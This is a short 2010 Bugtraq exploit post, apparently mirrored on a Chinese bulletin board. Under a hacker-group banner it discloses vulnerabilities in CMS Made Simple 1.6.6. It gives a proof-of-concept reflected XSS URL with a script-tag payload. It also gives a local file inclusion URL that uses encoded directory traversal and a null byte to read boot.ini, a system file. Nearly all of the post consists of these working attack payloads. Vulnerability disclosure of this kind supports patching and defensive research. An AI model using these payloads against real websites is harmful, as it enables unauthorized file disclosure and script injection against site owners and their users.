cmsmadesimple Multiple Security Issues : XSS+ LFI

看板Bugtraq作者時間16年前 (2010/02/13 04:32), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # Greetz to all Darkc0de ,AI,ICW, AH Memebers # Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit, # # Author: Beenu Arora # # Home : www.BeenuArora.com # # Email : beenudel1986@gmail.com # # Share the c0de! # ################################################################ # # Exploit: Multiple Vulnerablities in cmsmadesimple # # AppSite: http://www.cmsmadesimple.com/ # # Tested Version : 1.6.6 # XSS # # POC:-http://localhost/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script> # # # # Multiple Local File Inclusion # # Sample URL: # POC:-http://localhost:80/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39 # # ################################################################
更多 beenudel198. 的文章
文章代碼(AID): #1BTRh3Oo (Bugtraq)